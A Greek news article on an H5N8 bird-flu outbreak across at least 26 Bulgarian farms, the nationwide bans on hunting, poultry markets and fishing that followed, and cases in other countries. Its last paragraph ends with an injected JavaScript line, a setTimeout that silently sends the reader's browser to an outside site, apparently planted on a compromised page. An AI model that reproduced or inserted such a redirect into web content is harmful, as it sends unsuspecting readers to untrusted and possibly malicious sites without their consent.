Συναγερμός στη Βουλγαρία από τη γρίπη των πτηνών

0
33

Σε τουλάχιστον 26 αγροκτήματα έχει εξαπλωθεί ο ιός της γρίπης των πτηνών στη Βουλγαρία, σύμφωνα με το υπουργείο Γεωργίας της χώρας, σχεδόν διπλασιάζοντας τον αριθμό που είχε ανακοινώσει στις 30 Δεκεμβρίου, προκαλώντας μεγάλη ανησυχία στις αρμόδιες Αρχές.

Για να περιοριστεί το ξέσπασμα αυτό απαγορεύθηκε σε όλη τη χώρα με άμεση ισχύ το κυνήγι πτερωτών θηραμάτων και ανακοινώθηκε ότι θα γίνει μαζική σφαγή πουλερικών.

Σύμφωνα με τον εκπρόσωπο της Υπηρεσίας Ασφάλειας των Τροφίμων Μάρτιν Ράντεφ, η περιοχή που έχει πληγεί περισσότερο από τον ιό H5N8 είναι το Πλόβντιβ (Φιλιππούπολη) στη νότια Βουλγαρία.

Η Σόφια έχει ήδη απαγορεύσει σε εθνικό επίπεδο τις αγορές πουλερικών και έχει απαγορεύσει την αλιεία στις λίμνες και τους υδροβιότοπους με άγρια μεταναστευτικά πτηνά.

Η Γερμανία, η Γαλλία, η Ιρλανδία και το Ισραήλ βρίσκονται μεταξύ των χωρών που έχουν εντοπίσει κρούσματα του στελέχους αυτού της γρίπης των πτηνών τις τελευταίες εβδομάδες.

Την ίδια ώρα η Τσεχική Δημοκρατία ανακοίνωσε το πρώτο ξέσπασμα της γρίπης των πτηνών στο έδαφός της εδώ και μια δεκαετία. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here